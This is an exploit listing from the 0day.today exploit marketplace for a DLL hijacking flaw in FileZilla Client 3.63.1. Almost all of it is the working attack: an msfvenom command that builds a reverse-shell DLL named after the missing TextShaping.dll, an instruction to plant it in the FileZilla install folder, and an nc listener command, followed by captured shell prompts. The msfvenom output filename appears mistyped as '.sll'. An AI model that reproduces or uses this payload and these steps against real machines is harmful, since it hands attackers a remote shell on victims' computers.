[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FileZilla Client 3.63.1 - (TextShaping.dll) DLL Hijacking Vulnerability

Author
Bilal Qureshi
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38501
Category
local exploits
Date add
06-04-2023
Platform
windows
#---------------------------------------------------------
# Title: FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking
# Author: Bilal Qureshi
# Vendor: https://filezilla-project.org/
# Version: 3.63.1
# Tested on: Windows 10 Pro 64-bit (10.0, Build 19044)
#---------------------------------------------------------


Description:
FileZilla is a free and open-source, cross-platform FTP application, consisting of FileZilla Client and FileZilla Server. Clients are available for Windows, Linux, and macOS. Both server and client support FTP and FTPS, while the client can in addition connect to SFTP servers.


DLL Library named TextShaping.dll is not present at the FileZilla folder, this file can be loaded with the app.
Make malicious .dll file via msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o TextShaping.sll

place at the destination folder

start listener via nc

nc -lvp 7777

C:\PRogram Files\FileZilla FTP Client>
C:\PRogram Files\FileZilla FTP Client>

#  0day.today [2024-06-17]  #